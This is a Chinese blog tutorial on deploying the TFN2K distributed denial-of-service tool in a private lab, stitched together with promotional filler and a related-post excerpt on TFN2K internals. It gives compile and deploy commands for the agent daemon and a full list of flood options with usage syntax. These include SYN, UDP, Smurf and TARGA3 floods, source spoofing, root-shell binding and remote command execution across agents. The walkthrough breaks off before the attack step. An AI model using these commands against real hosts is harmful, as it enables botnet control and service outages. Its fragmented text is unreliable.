2024年网络安全最全软件TFN 2K的分布式拒绝攻击(DDos)实战详解_ddostfn攻击(2),2024网络安全者真的太难了

写在最后

在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。

需要完整版PDF学习资源私我

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!


什么是DDos

DDoS攻击(Distributed Denial of Service Attack),即分布式拒绝服务攻击。最简单的定义就是:多台电脑对一台电脑的攻击,占用目标服务器或网络资源的攻击行为

什么是TFN 2K

TFN 2K通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击,是DDos的实现工具

攻击体系

主控端—运行TFN客户端,来遥控并指定攻击目标,更改攻击方法

代理端—被植入并运行TD进程的牺牲品,接受TFN的指挥,攻击的实施者

在这里插入图片描述

TFN 2K特性

  • 主控端通过随机TCPUDPICMP之一的数据包向代理端主机发送命令,攻击方法包括TCP/SYNUDPICMP/PING、混合攻击、TARGA3等。
  • 主控端与代理端的通讯采取单向,即主控端只向代理端发送命令,并且会采取随机的头信息,甚至虚拟的源地址信息,代理端不会逆向向主控端发送任何信息。

二. 安装配置


我在个人本地服务器上部署了几台设备,来模拟应用场景。网络拓扑如下,需实现Master控制两台Attacker攻击两台Defender

在这里插入图片描述

2.1 安装TFN


在主控端Master下载TFN 2K软件(因软件的特殊性,本人概不提供相关的下载渠道),设下载并解压的文件夹名称为TFN2K

切换至下载目录,对软件进行编译,同时设置一个八位数的登录密码

cd TFN2K/src
make

编译后即可生成tfntd
在这里插入图片描述
登录所有代理端,将主机端的td下载到代理端本地

scp root@192.166.60.1:/root/TFN2K/src/td ./
scp root@192.166.61.1:/root/TFN2K/src/td ./

td赋权,并执行文件,此时,代理端部署完毕

chmod 777 td
./td

可利用ps -a查看进程,发现td已经在运行了
在这里插入图片描述

2.2 TFN命令讲解


可在主控端输入./tfn查看相关参数

  • -P protocol:设置服务器通信的协议。可以是ICMPUDPTCP。使用随机协议作为默认值
  • -D n:为每个真实的请求发送n个虚假请求以诱骗目标
  • -S hostIp:可指定源ip。默认情况下随机欺骗
  • -f hostlist:存储TFN的所有主控端的文件名,表示其中所有主控端均实现攻击操作
  • -h hostname:只利用该主控端发起攻击,也就是一对一的攻击,后面跟一个主机或IP地址
  • -p port:为SYN洪泛指定TCP目标端口
  • -c ID:攻击参数
    • -c 0 :停止攻击
    • -c 1:设置反欺骗等级设定,用法:-i 0(完全欺骗)到-i 3(/24个主机字节欺骗)
    • -c 2:改变攻击数据包大小,用法:-i <packet size in bytes>
    • -c 3:将根shell绑定到一个指定的端口,用法:-i<remote port>
    • -c 4UDP洪水,用法:-i victim@victim2@victim3@...
    • -c 5TCP/SYN洪水,用法:-i victim@...[-p目标端口]
    • -c 6ICMP/PING洪水,用法:-i victim@...
    • -c 7ICMP/SMURF洪水,用法:-i victim@broadcast@broadcast2@...
    • -c 8MIX flood(随机UDP/TCP/ICMP攻击),用法:-i victim@...
    • -c 9TARGA3洪水(IP堆栈渗透),用法:-i victim@...
    • -c 10:盲目执行远程shell命令,使用-i命令,一般还可用于远程命令控制

2.3 测试TD


在实现泛洪攻击前,先对所有的代理端进行测试,测试其是否可“听从”主控端的安排

创建host.txt文件用于记录所有运行了./td文件的代理端

echo "192.166.60.2" > host.txt
echo "192.166.61.2" > host.txt

操作tfn向所有的代理端实现创建文件夹的命令,一般创建的文件夹都和td在同一级目录

./tfn -f /root/TFN2K/host.txt -c 10 -i "mkdir TestMakeDir"

查看代理端可知,文件夹创建成功,表明主控端可操作所有的代理端
在这里插入图片描述

三. 攻击


3.1 准备工作


先为被攻击服务器安装流量抓包软件,在DF1上安装tcpdump

apt install tcpdump

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

  • 28
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
  什么是tfn2k?   tfn2k通过主控端利用大量代理端主机的资源进行对一个或多个目标进行协同攻击。当前互联网中的unix、solaris和windows nt等平台的主机能被用于此类攻击,而且这个工具非常容易被移植到其它系统平台上。   tfn2k由两部分组成:在主控端主机上的客户端和在代理端主机上的守护进程。主控端向其代理端发送攻击指定的目标主机列表。代理端据此对目标进行拒绝服务攻击。由一个主控端控制的多个代理端主机,能够在攻击过程中相互协同,保证攻击的连续性。主控央和代理端的网络通讯是经过加密的,还可能混杂了许多虚假数据包。整个tfn2k网络可能使用不同的tcp、udp或icmp包进行通讯。而且主控端还能伪造其ip地址。所有这些特性都使发展防御 tfn2k攻击的策略和技术都非常困难或效率低下。   tfn2k的技术内幕   ◆ 主控端通过tcp、udp、icmp或随机性使用其中之一的数据包向代理端主机   发送命令。对目标的攻击方法包括tcp/syn、udp、icmp/ping或broadcast   ping (smurf)数据包flood等。   ◆ 主控端与代理端之间数据包的头信息也是随机的,除了icmp总是使用   icmp_echoreply类型数据包。   ◆ 与其上一代版本tfn不同,tfn2k的守护程序是完全沉默的,它不会对接收   到的命令有任何回应。客户端重复发送每一个命令20次,并且认为守护程   序应该至少能接收到其中一个。   ◆ 这些命令数据包可能混杂了许多发送到随机ip地址的伪造数据包。   ◆ tfn2k命令不是基于字符串的,而采用了"++"格式,其中是   代表某个特定命令的数值,则是该命令的参数。   ◆ 所有命令都经过了cast-256算法(rfc 2612)加密。加密关键字在程序编   译时定义,并作为tfn2k客户端程序的口令。   ◆ 所有加密数据在发送前都被编码(base 64)成可打印的ascii字符。tfn2k   守护程序接收数据包并解密数据。   ◆ 守护进程为每一个攻击产生子进程。   ◆ tfn2k守护进程试图通过修改argv[0]内容(或在某些平台中修改进程名)   以掩饰自己。伪造的进程名在编译时指定,因此每次安装时都有可能不同。   这个功能使tfn2k伪装成代理端主机的普通正常进程。因此,只是简单地检   查进程列表未必能找到tfn2k守护进程(及其子进程)。   ◆ 来自每一个客户端或守护进程的所有数据包都可能被伪造。   监测tfn2k的特征

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值